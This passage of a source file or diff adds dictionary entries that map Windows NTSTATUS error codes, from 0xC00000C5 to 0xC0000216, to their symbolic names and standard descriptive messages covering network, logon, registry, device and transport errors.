+ 0xC00000C5: ("STATUS_BAD_REMOTE_ADAPTER","The remote adapter is not compatible."),
+ 0xC00000C6: ("STATUS_PRINT_QUEUE_FULL","The print queue is full."),
+ 0xC00000C7: ("STATUS_NO_SPOOL_SPACE","Space to store the file that is waiting to be printed is not available on the server."),
+ 0xC00000C8: ("STATUS_PRINT_CANCELLED","The requested print file has been canceled."),
+ 0xC00000C9: ("STATUS_NETWORK_NAME_DELETED","The network name was deleted."),
+ 0xC00000CA: ("STATUS_NETWORK_ACCESS_DENIED","Network access is denied."),
+ 0xC00000CB: ("STATUS_BAD_DEVICE_TYPE","{Incorrect Network Resource Type} The specified device type (LPT, for example) conflicts with the actual device type on the remote resource."),
+ 0xC00000CC: ("STATUS_BAD_NETWORK_NAME","{Network Name Not Found} The specified share name cannot be found on the remote server."),
+ 0xC00000CD: ("STATUS_TOO_MANY_NAMES","The name limit for the network adapter card of the local computer was exceeded."),
+ 0xC00000CE: ("STATUS_TOO_MANY_SESSIONS","The network BIOS session limit was exceeded."),
+ 0xC00000CF: ("STATUS_SHARING_PAUSED","File sharing has been temporarily paused."),
+ 0xC00000D0: ("STATUS_REQUEST_NOT_ACCEPTED","No more connections can be made to this remote computer at this time because the computer has already accepted the maximum number of connections."),
+ 0xC00000D1: ("STATUS_REDIRECTOR_PAUSED","Print or disk redirection is temporarily paused."),
+ 0xC00000D2: ("STATUS_NET_WRITE_FAULT","A network data fault occurred."),
+ 0xC00000D3: ("STATUS_PROFILING_AT_LIMIT","The number of active profiling objects is at the maximum and no more may be started."),
+ 0xC00000D4: ("STATUS_NOT_SAME_DEVICE","{Incorrect Volume} The destination file of a rename request is located on a different device than the source of the rename request."),
+ 0xC00000D5: ("STATUS_FILE_RENAMED","The specified file has been renamed and thus cannot be modified."),
+ 0xC00000D6: ("STATUS_VIRTUAL_CIRCUIT_CLOSED","{Network Request Timeout} The session with a remote server has been disconnected because the time-out interval for a request has expired."),
+ 0xC00000D7: ("STATUS_NO_SECURITY_ON_OBJECT","Indicates an attempt was made to operate on the security of an object that does not have security associated with it."),
+ 0xC00000D8: ("STATUS_CANT_WAIT","Used to indicate that an operation cannot continue without blocking for I/O."),
+ 0xC00000D9: ("STATUS_PIPE_EMPTY","Used to indicate that a read operation was done on an empty pipe."),
+ 0xC00000DA: ("STATUS_CANT_ACCESS_DOMAIN_INFO","Configuration information could not be read from the domain controller, either because the machine is unavailable or access has been denied."),
+ 0xC00000DB: ("STATUS_CANT_TERMINATE_SELF","Indicates that a thread attempted to terminate itself by default (called NtTerminateThread with NULL) and it was the last thread in the current process."),
+ 0xC00000DC: ("STATUS_INVALID_SERVER_STATE","Indicates the Sam Server was in the wrong state to perform the desired operation."),
+ 0xC00000DD: ("STATUS_INVALID_DOMAIN_STATE","Indicates the domain was in the wrong state to perform the desired operation."),
+ 0xC00000DE: ("STATUS_INVALID_DOMAIN_ROLE","This operation is only allowed for the primary domain controller of the domain."),
+ 0xC00000DF: ("STATUS_NO_SUCH_DOMAIN","The specified domain did not exist."),
+ 0xC00000E0: ("STATUS_DOMAIN_EXISTS","The specified domain already exists."),
+ 0xC00000E1: ("STATUS_DOMAIN_LIMIT_EXCEEDED","An attempt was made to exceed the limit on the number of domains per server for this release."),
+ 0xC00000E2: ("STATUS_OPLOCK_NOT_GRANTED","An error status returned when the opportunistic lock (oplock) request is denied."),
+ 0xC00000E3: ("STATUS_INVALID_OPLOCK_PROTOCOL","An error status returned when an invalid opportunistic lock (oplock) acknowledgment is received by a file system."),
+ 0xC00000E4: ("STATUS_INTERNAL_DB_CORRUPTION","This error indicates that the requested operation cannot be completed due to a catastrophic media failure or an on-disk data structure corruption."),
+ 0xC00000E5: ("STATUS_INTERNAL_ERROR","An internal error occurred."),
+ 0xC00000E6: ("STATUS_GENERIC_NOT_MAPPED","Indicates generic access types were contained in an access mask which should already be mapped to non-generic access types."),
+ 0xC00000E7: ("STATUS_BAD_DESCRIPTOR_FORMAT","Indicates a security descriptor is not in the necessary format (absolute or self-relative)."),
+ 0xC00000E8: ("STATUS_INVALID_USER_BUFFER","An access to a user buffer failed at an expected point in time. This code is defined because the caller does not want to accept STATUS_ACCESS_VIOLATION in its filter."),
+ 0xC00000E9: ("STATUS_UNEXPECTED_IO_ERROR","If an I/O error that is not defined in the standard FsRtl filter is returned, it is converted to the following error, which is guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception."),
+ 0xC00000EA: ("STATUS_UNEXPECTED_MM_CREATE_ERR","If an MM error that is not defined in the standard FsRtl filter is returned, it is converted to one of the following errors, which are guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception."),
+ 0xC00000EB: ("STATUS_UNEXPECTED_MM_MAP_ERROR","If an MM error that is not defined in the standard FsRtl filter is returned, it is converted to one of the following errors, which are guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception."),
+ 0xC00000EC: ("STATUS_UNEXPECTED_MM_EXTEND_ERR","If an MM error that is not defined in the standard FsRtl filter is returned, it is converted to one of the following errors, which are guaranteed to be in the filter. In this case, information is lost; however, the filter correctly handles the exception."),
+ 0xC00000ED: ("STATUS_NOT_LOGON_PROCESS","The requested action is restricted for use by logon processes only. The calling process has not registered as a logon process."),
+ 0xC00000EE: ("STATUS_LOGON_SESSION_EXISTS","An attempt has been made to start a new session manager or LSA logon session by using an ID that is already in use."),
+ 0xC00000EF: ("STATUS_INVALID_PARAMETER_1","An invalid parameter was passed to a service or function as the first argument."),
+ 0xC00000F0: ("STATUS_INVALID_PARAMETER_2","An invalid parameter was passed to a service or function as the second argument."),
+ 0xC00000F1: ("STATUS_INVALID_PARAMETER_3","An invalid parameter was passed to a service or function as the third argument."),
+ 0xC00000F2: ("STATUS_INVALID_PARAMETER_4","An invalid parameter was passed to a service or function as the fourth argument."),
+ 0xC00000F3: ("STATUS_INVALID_PARAMETER_5","An invalid parameter was passed to a service or function as the fifth argument."),
+ 0xC00000F4: ("STATUS_INVALID_PARAMETER_6","An invalid parameter was passed to a service or function as the sixth argument."),
+ 0xC00000F5: ("STATUS_INVALID_PARAMETER_7","An invalid parameter was passed to a service or function as the seventh argument."),
+ 0xC00000F6: ("STATUS_INVALID_PARAMETER_8","An invalid parameter was passed to a service or function as the eighth argument."),
+ 0xC00000F7: ("STATUS_INVALID_PARAMETER_9","An invalid parameter was passed to a service or function as the ninth argument."),
+ 0xC00000F8: ("STATUS_INVALID_PARAMETER_10","An invalid parameter was passed to a service or function as the tenth argument."),
+ 0xC00000F9: ("STATUS_INVALID_PARAMETER_11","An invalid parameter was passed to a service or function as the eleventh argument."),
+ 0xC00000FA: ("STATUS_INVALID_PARAMETER_12","An invalid parameter was passed to a service or function as the twelfth argument."),
+ 0xC00000FB: ("STATUS_REDIRECTOR_NOT_STARTED","An attempt was made to access a network file, but the network software was not yet started."),
+ 0xC00000FC: ("STATUS_REDIRECTOR_STARTED","An attempt was made to start the redirector, but the redirector has already been started."),
+ 0xC00000FD: ("STATUS_STACK_OVERFLOW","A new guard page for the stack cannot be created."),
+ 0xC00000FE: ("STATUS_NO_SUCH_PACKAGE","A specified authentication package is unknown."),
+ 0xC00000FF: ("STATUS_BAD_FUNCTION_TABLE","A malformed function table was encountered during an unwind operation."),
+ 0xC0000100: ("STATUS_VARIABLE_NOT_FOUND","Indicates the specified environment variable name was not found in the specified environment block."),
+ 0xC0000101: ("STATUS_DIRECTORY_NOT_EMPTY","Indicates that the directory trying to be deleted is not empty."),
+ 0xC0000102: ("STATUS_FILE_CORRUPT_ERROR","{Corrupt File} The file or directory %hs is corrupt and unreadable. Run the Chkdsk utility."),
+ 0xC0000103: ("STATUS_NOT_A_DIRECTORY","A requested opened file is not a directory."),
+ 0xC0000104: ("STATUS_BAD_LOGON_SESSION_STATE","The logon session is not in a state that is consistent with the requested operation."),
+ 0xC0000105: ("STATUS_LOGON_SESSION_COLLISION","An internal LSA error has occurred. An authentication package has requested the creation of a logon session but the ID of an already existing logon session has been specified."),
+ 0xC0000106: ("STATUS_NAME_TOO_LONG","A specified name string is too long for its intended use."),
+ 0xC0000107: ("STATUS_FILES_OPEN","The user attempted to force close the files on a redirected drive, but there were opened files on the drive, and the user did not specify a sufficient level of force."),
+ 0xC0000108: ("STATUS_CONNECTION_IN_USE","The user attempted to force close the files on a redirected drive, but there were opened directories on the drive, and the user did not specify a sufficient level of force."),
+ 0xC0000109: ("STATUS_MESSAGE_NOT_FOUND","RtlFindMessage could not locate the requested message ID in the message table resource."),
+ 0xC000010A: ("STATUS_PROCESS_IS_TERMINATING","An attempt was made to duplicate an object handle into or out of an exiting process."),
+ 0xC000010B: ("STATUS_INVALID_LOGON_TYPE","Indicates an invalid value has been provided for the LogonType requested."),
+ 0xC000010C: ("STATUS_NO_GUID_TRANSLATION","Indicates that an attempt was made to assign protection to a file system file or directory and one of the SIDs in the security descriptor could not be translated into a GUID that could be stored by the file system. This causes the protection attempt to fail, which may cause a file creation attempt to fail."),
+ 0xC000010D: ("STATUS_CANNOT_IMPERSONATE","Indicates that an attempt has been made to impersonate via a named pipe that has not yet been read from."),
+ 0xC000010E: ("STATUS_IMAGE_ALREADY_LOADED","Indicates that the specified image is already loaded."),
+ 0xC0000117: ("STATUS_NO_LDT","Indicates that an attempt was made to change the size of the LDT for a process that has no LDT."),
+ 0xC0000118: ("STATUS_INVALID_LDT_SIZE","Indicates that an attempt was made to grow an LDT by setting its size, or that the size was not an even number of selectors."),
+ 0xC0000119: ("STATUS_INVALID_LDT_OFFSET","Indicates that the starting value for the LDT information was not an integral multiple of the selector size."),
+ 0xC000011A: ("STATUS_INVALID_LDT_DESCRIPTOR","Indicates that the user supplied an invalid descriptor when trying to set up LDT descriptors."),
+ 0xC000011B: ("STATUS_INVALID_IMAGE_NE_FORMAT","The specified image file did not have the correct format. It appears to be NE format."),
+ 0xC000011C: ("STATUS_RXACT_INVALID_STATE","Indicates that the transaction state of a registry subtree is incompatible with the requested operation. For example, a request has been made to start a new transaction with one already in progress, or a request has been made to apply a transaction when one is not currently in progress."),
+ 0xC000011D: ("STATUS_RXACT_COMMIT_FAILURE","Indicates an error has occurred during a registry transaction commit. The database has been left in an unknown, but probably inconsistent, state. The state of the registry transaction is left as COMMITTING."),
+ 0xC000011E: ("STATUS_MAPPED_FILE_SIZE_ZERO","An attempt was made to map a file of size zero with the maximum size specified as zero."),
+ 0xC000011F: ("STATUS_TOO_MANY_OPENED_FILES","Too many files are opened on a remote server. This error should only be returned by the Windows redirector on a remote drive."),
+ 0xC0000120: ("STATUS_CANCELLED","The I/O request was canceled."),
+ 0xC0000121: ("STATUS_CANNOT_DELETE","An attempt has been made to remove a file or directory that cannot be deleted."),
+ 0xC0000122: ("STATUS_INVALID_COMPUTER_NAME","Indicates a name that was specified as a remote computer name is syntactically invalid."),
+ 0xC0000123: ("STATUS_FILE_DELETED","An I/O request other than close was performed on a file after it was deleted, which can only happen to a request that did not complete before the last handle was closed via NtClose."),
+ 0xC0000124: ("STATUS_SPECIAL_ACCOUNT","Indicates an operation that is incompatible with built-in accounts has been attempted on a built-in (special) SAM account. For example, built-in accounts cannot be deleted."),
+ 0xC0000125: ("STATUS_SPECIAL_GROUP","The operation requested may not be performed on the specified group because it is a built-in special group."),
+ 0xC0000126: ("STATUS_SPECIAL_USER","The operation requested may not be performed on the specified user because it is a built-in special user."),
+ 0xC0000127: ("STATUS_MEMBERS_PRIMARY_GROUP","Indicates a member cannot be removed from a group because the group is currently the member's primary group."),
+ 0xC0000128: ("STATUS_FILE_CLOSED","An I/O request other than close and several other special case operations was attempted using a file object that had already been closed."),
+ 0xC0000129: ("STATUS_TOO_MANY_THREADS","Indicates a process has too many threads to perform the requested action. For example, assignment of a primary token may only be performed when a process has zero or one threads."),
+ 0xC000012A: ("STATUS_THREAD_NOT_IN_PROCESS","An attempt was made to operate on a thread within a specific process, but the specified thread is not in the specified process."),
+ 0xC000012B: ("STATUS_TOKEN_ALREADY_IN_USE","An attempt was made to establish a token for use as a primary token but the token is already in use. A token can only be the primary token of one process at a time."),
+ 0xC000012C: ("STATUS_PAGEFILE_QUOTA_EXCEEDED","The page file quota was exceeded."),
+ 0xC000012D: ("STATUS_COMMITMENT_LIMIT","{Out of Virtual Memory} Your system is low on virtual memory. To ensure that Windows runs correctly, increase the size of your virtual memory paging file. For more information, see Help."),
+ 0xC000012E: ("STATUS_INVALID_IMAGE_LE_FORMAT","The specified image file did not have the correct format: it appears to be LE format."),
+ 0xC000012F: ("STATUS_INVALID_IMAGE_NOT_MZ","The specified image file did not have the correct format: it did not have an initial MZ."),
+ 0xC0000130: ("STATUS_INVALID_IMAGE_PROTECT","The specified image file did not have the correct format: it did not have a proper e_lfarlc in the MZ header."),
+ 0xC0000131: ("STATUS_INVALID_IMAGE_WIN_16","The specified image file did not have the correct format: it appears to be a 16-bit Windows image."),
+ 0xC0000132: ("STATUS_LOGON_SERVER_CONFLICT","The Netlogon service cannot start because another Netlogon service running in the domain conflicts with the specified role."),
+ 0xC0000133: ("STATUS_TIME_DIFFERENCE_AT_DC","The time at the primary domain controller is different from the time at the backup domain controller or member server by too large an amount."),
+ 0xC0000134: ("STATUS_SYNCHRONIZATION_REQUIRED","The SAM database on a Windows Server is significantly out of synchronization with the copy on the domain controller. A complete synchronization is required."),
+ 0xC0000135: ("STATUS_DLL_NOT_FOUND","{Unable To Locate Component} This application has failed to start because %hs was not found. Reinstalling the application may fix this problem."),
+ 0xC0000136: ("STATUS_OPEN_FAILED","The NtCreateFile API failed. This error should never be returned to an application; it is a place holder for the Windows LAN Manager Redirector to use in its internal error-mapping routines."),
+ 0xC0000137: ("STATUS_IO_PRIVILEGE_FAILED","{Privilege Failed} The I/O permissions for the process could not be changed."),
+ 0xC0000138: ("STATUS_ORDINAL_NOT_FOUND","{Ordinal Not Found} The ordinal %ld could not be located in the dynamic link library %hs."),
+ 0xC0000139: ("STATUS_ENTRYPOINT_NOT_FOUND","{Entry Point Not Found} The procedure entry point %hs could not be located in the dynamic link library %hs."),
+ 0xC000013A: ("STATUS_CONTROL_C_EXIT","{Application Exit by CTRL+C} The application terminated as a result of a CTRL+C."),
+ 0xC000013B: ("STATUS_LOCAL_DISCONNECT","{Virtual Circuit Closed} The network transport on your computer has closed a network connection. There may or may not be I/O requests outstanding."),
+ 0xC000013C: ("STATUS_REMOTE_DISCONNECT","{Virtual Circuit Closed} The network transport on a remote computer has closed a network connection. There may or may not be I/O requests outstanding."),
+ 0xC000013D: ("STATUS_REMOTE_RESOURCES","{Insufficient Resources on Remote Computer} The remote computer has insufficient resources to complete the network request. For example, the remote computer may not have enough available memory to carry out the request at this time."),
+ 0xC000013E: ("STATUS_LINK_FAILED","{Virtual Circuit Closed} An existing connection (virtual circuit) has been broken at the remote computer. There is probably something wrong with the network software protocol or the network hardware on the remote computer."),
+ 0xC000013F: ("STATUS_LINK_TIMEOUT","{Virtual Circuit Closed} The network transport on your computer has closed a network connection because it had to wait too long for a response from the remote computer."),
+ 0xC0000140: ("STATUS_INVALID_CONNECTION","The connection handle that was given to the transport was invalid."),
+ 0xC0000141: ("STATUS_INVALID_ADDRESS","The address handle that was given to the transport was invalid."),
+ 0xC0000142: ("STATUS_DLL_INIT_FAILED","{DLL Initialization Failed} Initialization of the dynamic link library %hs failed. The process is terminating abnormally."),
+ 0xC0000143: ("STATUS_MISSING_SYSTEMFILE","{Missing System File} The required system file %hs is bad or missing."),
+ 0xC0000144: ("STATUS_UNHANDLED_EXCEPTION","{Application Error} The exception %s (0x%08lx) occurred in the application at location 0x%08lx."),
+ 0xC0000145: ("STATUS_APP_INIT_FAILURE","{Application Error} The application failed to initialize properly (0x%lx). Click OK to terminate the application."),
+ 0xC0000146: ("STATUS_PAGEFILE_CREATE_FAILED","{Unable to Create Paging File} The creation of the paging file %hs failed (%lx). The requested size was %ld."),
+ 0xC0000147: ("STATUS_NO_PAGEFILE","{No Paging File Specified} No paging file was specified in the system configuration."),
+ 0xC0000148: ("STATUS_INVALID_LEVEL","{Incorrect System Call Level} An invalid level was passed into the specified system call."),
+ 0xC0000149: ("STATUS_WRONG_PASSWORD_CORE","{Incorrect Password to LAN Manager Server} You specified an incorrect password to a LAN Manager 2.x or MS-NET server."),
+ 0xC000014A: ("STATUS_ILLEGAL_FLOAT_CONTEXT","{EXCEPTION} A real-mode application issued a floating-point instruction and floating-point hardware is not present."),
+ 0xC000014B: ("STATUS_PIPE_BROKEN","The pipe operation has failed because the other end of the pipe has been closed."),
+ 0xC000014C: ("STATUS_REGISTRY_CORRUPT","{The Registry Is Corrupt} The structure of one of the files that contains registry data is corrupt; the image of the file in memory is corrupt; or the file could not be recovered because the alternate copy or log was absent or corrupt."),
+ 0xC000014D: ("STATUS_REGISTRY_IO_FAILED","An I/O operation initiated by the Registry failed and cannot be recovered. The registry could not read in, write out, or flush one of the files that contain the system's image of the registry."),
+ 0xC000014E: ("STATUS_NO_EVENT_PAIR","An event pair synchronization operation was performed using the thread-specific client/server event pair object, but no event pair object was associated with the thread."),
+ 0xC000014F: ("STATUS_UNRECOGNIZED_VOLUME","The volume does not contain a recognized file system. Be sure that all required file system drivers are loaded and that the volume is not corrupt."),
+ 0xC0000150: ("STATUS_SERIAL_NO_DEVICE_INITED","No serial device was successfully initialized. The serial driver will unload."),
+ 0xC0000151: ("STATUS_NO_SUCH_ALIAS","The specified local group does not exist."),
+ 0xC0000152: ("STATUS_MEMBER_NOT_IN_ALIAS","The specified account name is not a member of the group."),
+ 0xC0000153: ("STATUS_MEMBER_IN_ALIAS","The specified account name is already a member of the group."),
+ 0xC0000154: ("STATUS_ALIAS_EXISTS","The specified local group already exists."),
+ 0xC0000155: ("STATUS_LOGON_NOT_GRANTED","A requested type of logon (for example, interactive, network, and service) is not granted by the local security policy of the target system. Ask the system administrator to grant the necessary form of logon."),
+ 0xC0000156: ("STATUS_TOO_MANY_SECRETS","The maximum number of secrets that may be stored in a single system was exceeded. The length and number of secrets is limited to satisfy U.S. State Department export restrictions."),
+ 0xC0000157: ("STATUS_SECRET_TOO_LONG","The length of a secret exceeds the maximum allowable length. The length and number of secrets is limited to satisfy U.S. State Department export restrictions."),
+ 0xC0000158: ("STATUS_INTERNAL_DB_ERROR","The local security authority (LSA) database contains an internal inconsistency."),
+ 0xC0000159: ("STATUS_FULLSCREEN_MODE","The requested operation cannot be performed in full-screen mode."),
+ 0xC000015A: ("STATUS_TOO_MANY_CONTEXT_IDS","During a logon attempt, the user's security context accumulated too many security IDs. This is a very unusual situation. Remove the user from some global or local groups to reduce the number of security IDs to incorporate into the security context."),
+ 0xC000015B: ("STATUS_LOGON_TYPE_NOT_GRANTED","A user has requested a type of logon (for example, interactive or network) that has not been granted. An administrator has control over who may logon interactively and through the network."),
+ 0xC000015C: ("STATUS_NOT_REGISTRY_FILE","The system has attempted to load or restore a file into the registry, and the specified file is not in the format of a registry file."),
+ 0xC000015D: ("STATUS_NT_CROSS_ENCRYPTION_REQUIRED","An attempt was made to change a user password in the security account manager without providing the necessary Windows cross-encrypted password."),
+ 0xC000015E: ("STATUS_DOMAIN_CTRLR_CONFIG_ERROR","A Windows Server has an incorrect configuration."),
+ 0xC000015F: ("STATUS_FT_MISSING_MEMBER","An attempt was made to explicitly access the secondary copy of information via a device control to the fault tolerance driver and the secondary copy is not present in the system."),
+ 0xC0000160: ("STATUS_ILL_FORMED_SERVICE_ENTRY","A configuration registry node that represents a driver service entry was ill-formed and did not contain the required value entries."),
+ 0xC0000161: ("STATUS_ILLEGAL_CHARACTER","An illegal character was encountered. For a multibyte character set, this includes a lead byte without a succeeding trail byte. For the Unicode character set this includes the characters 0xFFFF and 0xFFFE."),
+ 0xC0000162: ("STATUS_UNMAPPABLE_CHARACTER","No mapping for the Unicode character exists in the target multibyte code page."),
+ 0xC0000163: ("STATUS_UNDEFINED_CHARACTER","The Unicode character is not defined in the Unicode character set that is installed on the system."),
+ 0xC0000164: ("STATUS_FLOPPY_VOLUME","The paging file cannot be created on a floppy disk."),
+ 0xC0000165: ("STATUS_FLOPPY_ID_MARK_NOT_FOUND","{Floppy Disk Error} While accessing a floppy disk, an ID address mark was not found."),
+ 0xC0000166: ("STATUS_FLOPPY_WRONG_CYLINDER","{Floppy Disk Error} While accessing a floppy disk, the track address from the sector ID field was found to be different from the track address that is maintained by the controller."),
+ 0xC0000167: ("STATUS_FLOPPY_UNKNOWN_ERROR","{Floppy Disk Error} The floppy disk controller reported an error that is not recognized by the floppy disk driver."),
+ 0xC0000168: ("STATUS_FLOPPY_BAD_REGISTERS","{Floppy Disk Error} While accessing a floppy-disk, the controller returned inconsistent results via its registers."),
+ 0xC0000169: ("STATUS_DISK_RECALIBRATE_FAILED","{Hard Disk Error} While accessing the hard disk, a recalibrate operation failed, even after retries."),
+ 0xC000016A: ("STATUS_DISK_OPERATION_FAILED","{Hard Disk Error} While accessing the hard disk, a disk operation failed even after retries."),
+ 0xC000016B: ("STATUS_DISK_RESET_FAILED","{Hard Disk Error} While accessing the hard disk, a disk controller reset was needed, but even that failed."),
+ 0xC000016C: ("STATUS_SHARED_IRQ_BUSY","An attempt was made to open a device that was sharing an interrupt request (IRQ) with other devices. At least one other device that uses that IRQ was already opened. Two concurrent opens of devices that share an IRQ and only work via interrupts is not supported for the particular bus type that the devices use."),
+ 0xC000016D: ("STATUS_FT_ORPHANING","{FT Orphaning} A disk that is part of a fault-tolerant volume can no longer be accessed."),
+ 0xC000016E: ("STATUS_BIOS_FAILED_TO_CONNECT_INTERRUPT","The basic input/output system (BIOS) failed to connect a system interrupt to the device or bus for which the device is connected."),
+ 0xC0000172: ("STATUS_PARTITION_FAILURE","The tape could not be partitioned."),
+ 0xC0000173: ("STATUS_INVALID_BLOCK_LENGTH","When accessing a new tape of a multi-volume partition, the current blocksize is incorrect."),
+ 0xC0000174: ("STATUS_DEVICE_NOT_PARTITIONED","The tape partition information could not be found when loading a tape."),
+ 0xC0000175: ("STATUS_UNABLE_TO_LOCK_MEDIA","An attempt to lock the eject media mechanism failed."),
+ 0xC0000176: ("STATUS_UNABLE_TO_UNLOAD_MEDIA","An attempt to unload media failed."),
+ 0xC0000177: ("STATUS_EOM_OVERFLOW","The physical end of tape was detected."),
+ 0xC0000178: ("STATUS_NO_MEDIA","{No Media} There is no media in the drive. Insert media into drive %hs."),
+ 0xC000017A: ("STATUS_NO_SUCH_MEMBER","A member could not be added to or removed from the local group because the member does not exist."),
+ 0xC000017B: ("STATUS_INVALID_MEMBER","A new member could not be added to a local group because the member has the wrong account type."),
+ 0xC000017C: ("STATUS_KEY_DELETED","An illegal operation was attempted on a registry key that has been marked for deletion."),
+ 0xC000017D: ("STATUS_NO_LOG_SPACE","The system could not allocate the required space in a registry log."),
+ 0xC000017E: ("STATUS_TOO_MANY_SIDS","Too many SIDs have been specified."),
+ 0xC000017F: ("STATUS_LM_CROSS_ENCRYPTION_REQUIRED","An attempt was made to change a user password in the security account manager without providing the necessary LM cross-encrypted password."),
+ 0xC0000180: ("STATUS_KEY_HAS_CHILDREN","An attempt was made to create a symbolic link in a registry key that already has subkeys or values."),
+ 0xC0000181: ("STATUS_CHILD_MUST_BE_VOLATILE","An attempt was made to create a stable subkey under a volatile parent key."),
+ 0xC0000182: ("STATUS_DEVICE_CONFIGURATION_ERROR","The I/O device is configured incorrectly or the configuration parameters to the driver are incorrect."),
+ 0xC0000183: ("STATUS_DRIVER_INTERNAL_ERROR","An error was detected between two drivers or within an I/O driver."),
+ 0xC0000184: ("STATUS_INVALID_DEVICE_STATE","The device is not in a valid state to perform this request."),
+ 0xC0000185: ("STATUS_IO_DEVICE_ERROR","The I/O device reported an I/O error."),
+ 0xC0000186: ("STATUS_DEVICE_PROTOCOL_ERROR","A protocol error was detected between the driver and the device."),
+ 0xC0000187: ("STATUS_BACKUP_CONTROLLER","This operation is only allowed for the primary domain controller of the domain."),
+ 0xC0000188: ("STATUS_LOG_FILE_FULL","The log file space is insufficient to support this operation."),
+ 0xC0000189: ("STATUS_TOO_LATE","A write operation was attempted to a volume after it was dismounted."),
+ 0xC000018A: ("STATUS_NO_TRUST_LSA_SECRET","The workstation does not have a trust secret for the primary domain in the local LSA database."),
+ 0xC000018B: ("STATUS_NO_TRUST_SAM_ACCOUNT","The SAM database on the Windows Server does not have a computer account for this workstation trust relationship."),
+ 0xC000018C: ("STATUS_TRUSTED_DOMAIN_FAILURE","The logon request failed because the trust relationship between the primary domain and the trusted domain failed."),
+ 0xC000018D: ("STATUS_TRUSTED_RELATIONSHIP_FAILURE","The logon request failed because the trust relationship between this workstation and the primary domain failed."),
+ 0xC000018E: ("STATUS_EVENTLOG_FILE_CORRUPT","The Eventlog log file is corrupt."),
+ 0xC000018F: ("STATUS_EVENTLOG_CANT_START","No Eventlog log file could be opened. The Eventlog service did not start."),
+ 0xC0000190: ("STATUS_TRUST_FAILURE","The network logon failed. This may be because the validation authority cannot be reached."),
+ 0xC0000191: ("STATUS_MUTANT_LIMIT_EXCEEDED","An attempt was made to acquire a mutant such that its maximum count would have been exceeded."),
+ 0xC0000192: ("STATUS_NETLOGON_NOT_STARTED","An attempt was made to logon, but the NetLogon service was not started."),
+ 0xC0000193: ("STATUS_ACCOUNT_EXPIRED","The user account has expired."),
+ 0xC0000194: ("STATUS_POSSIBLE_DEADLOCK","{EXCEPTION} Possible deadlock condition."),
+ 0xC0000195: ("STATUS_NETWORK_CREDENTIAL_CONFLICT","Multiple connections to a server or shared resource by the same user, using more than one user name, are not allowed. Disconnect all previous connections to the server or shared resource and try again."),
+ 0xC0000196: ("STATUS_REMOTE_SESSION_LIMIT","An attempt was made to establish a session to a network server, but there are already too many sessions established to that server."),
+ 0xC0000197: ("STATUS_EVENTLOG_FILE_CHANGED","The log file has changed between reads."),
+ 0xC0000198: ("STATUS_NOLOGON_INTERDOMAIN_TRUST_ACCOUNT","The account used is an interdomain trust account. Use your global user account or local user account to access this server."),
+ 0xC0000199: ("STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT","The account used is a computer account. Use your global user account or local user account to access this server."),
+ 0xC000019A: ("STATUS_NOLOGON_SERVER_TRUST_ACCOUNT","The account used is a server trust account. Use your global user account or local user account to access this server."),
+ 0xC000019B: ("STATUS_DOMAIN_TRUST_INCONSISTENT","The name or SID of the specified domain is inconsistent with the trust information for that domain."),
+ 0xC000019C: ("STATUS_FS_DRIVER_REQUIRED","A volume has been accessed for which a file system driver is required that has not yet been loaded."),
+ 0xC000019D: ("STATUS_IMAGE_ALREADY_LOADED_AS_DLL","Indicates that the specified image is already loaded as a DLL."),
+ 0xC000019E: ("STATUS_INCOMPATIBLE_WITH_GLOBAL_SHORT_NAME_REGISTRY_SETTING","Short name settings may not be changed on this volume due to the global registry setting."),
+ 0xC000019F: ("STATUS_SHORT_NAMES_NOT_ENABLED_ON_VOLUME","Short names are not enabled on this volume."),
+ 0xC00001A0: ("STATUS_SECURITY_STREAM_IS_INCONSISTENT","The security stream for the given volume is in an inconsistent state. Please run CHKDSK on the volume."),
+ 0xC00001A1: ("STATUS_INVALID_LOCK_RANGE","A requested file lock operation cannot be processed due to an invalid byte range."),
+ 0xC00001A2: ("STATUS_INVALID_ACE_CONDITION","The specified access control entry (ACE) contains an invalid condition."),
+ 0xC00001A3: ("STATUS_IMAGE_SUBSYSTEM_NOT_PRESENT","The subsystem needed to support the image type is not present."),
+ 0xC00001A4: ("STATUS_NOTIFICATION_GUID_ALREADY_DEFINED","The specified file already has a notification GUID associated with it."),
+ 0xC0000201: ("STATUS_NETWORK_OPEN_RESTRICTION","A remote open failed because the network open restrictions were not satisfied."),
+ 0xC0000202: ("STATUS_NO_USER_SESSION_KEY","There is no user session key for the specified logon session."),
+ 0xC0000203: ("STATUS_USER_SESSION_DELETED","The remote user session has been deleted."),
+ 0xC0000204: ("STATUS_RESOURCE_LANG_NOT_FOUND","Indicates the specified resource language ID cannot be found in the image file."),
+ 0xC0000205: ("STATUS_INSUFF_SERVER_RESOURCES","Insufficient server resources exist to complete the request."),
+ 0xC0000206: ("STATUS_INVALID_BUFFER_SIZE","The size of the buffer is invalid for the specified operation."),
+ 0xC0000207: ("STATUS_INVALID_ADDRESS_COMPONENT","The transport rejected the specified network address as invalid."),
+ 0xC0000208: ("STATUS_INVALID_ADDRESS_WILDCARD","The transport rejected the specified network address due to invalid use of a wildcard."),
+ 0xC0000209: ("STATUS_TOO_MANY_ADDRESSES","The transport address could not be opened because all the available addresses are in use."),
+ 0xC000020A: ("STATUS_ADDRESS_ALREADY_EXISTS","The transport address could not be opened because it already exists."),
+ 0xC000020B: ("STATUS_ADDRESS_CLOSED","The transport address is now closed."),
+ 0xC000020C: ("STATUS_CONNECTION_DISCONNECTED","The transport connection is now disconnected."),
+ 0xC000020D: ("STATUS_CONNECTION_RESET","The transport connection has been reset."),
+ 0xC000020E: ("STATUS_TOO_MANY_NODES","The transport cannot dynamically acquire any more nodes."),
+ 0xC000020F: ("STATUS_TRANSACTION_ABORTED","The transport aborted a pending transaction."),
+ 0xC0000210: ("STATUS_TRANSACTION_TIMED_OUT","The transport timed out a request that is waiting for a response."),
+ 0xC0000211: ("STATUS_TRANSACTION_NO_RELEASE","The transport did not receive a release for a pending response."),
+ 0xC0000212: ("STATUS_TRANSACTION_NO_MATCH","The transport did not find a transaction that matches the specific token."),
+ 0xC0000213: ("STATUS_TRANSACTION_RESPONDED","The transport had previously responded to a transaction request."),
+ 0xC0000214: ("STATUS_TRANSACTION_INVALID_ID","The transport does not recognize the specified transaction request ID."),
+ 0xC0000215: ("STATUS_TRANSACTION_INVALID_TYPE","The transport does not recognize the specified transaction request type."),
+ 0xC0000216: ("STATUS_NOT_SERVER_SESSION","The transport can only process the specified request on the server side of a session."),
